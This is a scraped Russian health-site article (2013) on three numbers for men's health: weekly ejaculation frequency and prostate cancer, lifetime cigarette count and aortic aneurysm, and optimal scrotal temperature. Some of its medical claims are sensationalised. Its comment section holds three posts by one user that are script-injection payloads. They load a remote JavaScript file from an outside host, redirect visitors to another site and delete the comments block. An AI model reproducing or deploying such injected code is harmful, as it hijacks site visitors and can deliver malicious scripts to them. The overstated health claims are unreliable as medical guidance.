Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Секс. Курение. Температур...  >>  Секс. Курение. Температура. Три цифры для вашего мужа
 
Обратная связь
 

Секс. Курение. Температура. Три цифры для вашего мужа

Размер шрифта
09 августа 2013 00:00
  • google_analytics: false
  • Нравится

Сколько раз заниматься сексом, сколько сигарет курить, какая температура должна быть. 3 цифры, которые сделают любого мужчин здоровым!

Цифра «3»

Ученые давно доказали, что секс полезен для здоровья, и чуть ли не каждый день появляются все новые и новые факты, свидетельствующие в пользу этого постулата.

Так, совсем недавно в США прошло исследование, в ходе которого врачи наблюдали за 30000 мужчинами в течение восьми лет. Выяснилось, что у мужчин, которые эякулировали не менее трех раз в неделю, риск рака предстательной железы снижался на 15%!

По-видимому, это связано с тем, что регулярные эякуляции препятствуют застою семенной жидкости в простате, что снижает концентрацию потенциальных канцерогенов в этом органе. Мужчина буквально вымывает вредные вещества из своей предстательной железы, если регулярно занимается сексом!

Женщины, мужа в охапку и бегом в спальню! Судьба мужчин в ваших руках!

Цифра «100»

Если мужчина за свою жизнь (!) выкурил более ста сигарет – он попадает в группу риска развития аневризмы аорты.

С возрастом, особенно после 50 лет, наша аорта теряет эластические волокна и ей становится все труднее растягиваться. (У мужчин этот процесс выражен в значительно большей степени). Поэтому при повышении давления стенка сосуда испытывает все большую нагрузку. У курильщиков ситуация усугубляется, потому что продукты сгорания табака повреждают эндотелиальную выстилку сосудов. Внутренняя поверхность аорты теряет герметичность, в ней возникают слабые места, бреши. Туда, с одной стороны, устремляется холестерин (и развивается атеросклероз), но, что намного хуже, в одном из этих слабых мест может возникнуть мешотчатое выпячивание – аневризма. Если она лопнет (а без лечения это фактически неизбежно), человек за секунды истечет кровью и погибнет.

Цифра «34,4»

34,4оС – температура мошонки, оптимальная для созревания сперматозоида.

Вы никогда не задумывались, почему у женщин половые железы находятся внутри туловища, а у мужчин – вынесены за его пределы? Дело в том, что сперматогенез (процесс созревания мужских половых клеток) невозможен при нормальной температуре тела. Сперматозоиды любят прохладу!

Вот зачем мужчинам нужна мошонка! Это мягкотканный мешочек, в котором лежат яички. В этом мешочке два отдела, разделенных перегородкой (шов на коже мошонки соответствует этой перегородке).

Если вы думаете, что мошонка состоит только из кожи, то глубоко заблуждаетесь. В мошонке – целых 7 слоев! Самый удивительный из них состоит только из мышечных клеток. По сути это и есть мышца мешотчатой формы. По-латински она называется «кремастер», то есть мышца, поднимающая яичко. Зачем она нужна? Как раз-таки для регуляции температуры!

Если становится жарко, кремастер предельно расслабляется, чтобы отдалить яички от тела. Если становится холодно – кремастер сокращается, приближая яички к телу.

Поддержание оптимальной температуры мошонки крайне важно для мужской фертильности! Поэтому не злоупотребляйте сауной и горячими ванными, откажитесь от тесного нижнего белья и не засиживайтесь на одном месте.

Но наше главное обращение к женщинам! Кому как не вам следить за здоровьем наших мужчин! Так что любите их (во всех смыслах), не разрешайте курить и измеряйте температуру!

Также вы можете посмотреть сюжет передачи «Жить здорово» «3 цифры для мужчин. Здоровье – под контроль».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

10 августа 2013 в 17:30

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 19:08

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 19:29

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 23:07

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
От чего умирает Россия   Как быть здоровым ничего не делая   Обрезание после 35 лет предотвратит рак простаты! Осталось только найти желающих...   В лабораториях научились выращивать настоящие половые члены?  
13 июня 2013Перец, как и сигареты, спасает от Паркинсона! 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Что секс говорит о вашем здоровье
Как повысить свою плодовитость
Проблемы с внешностью или болезнь?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.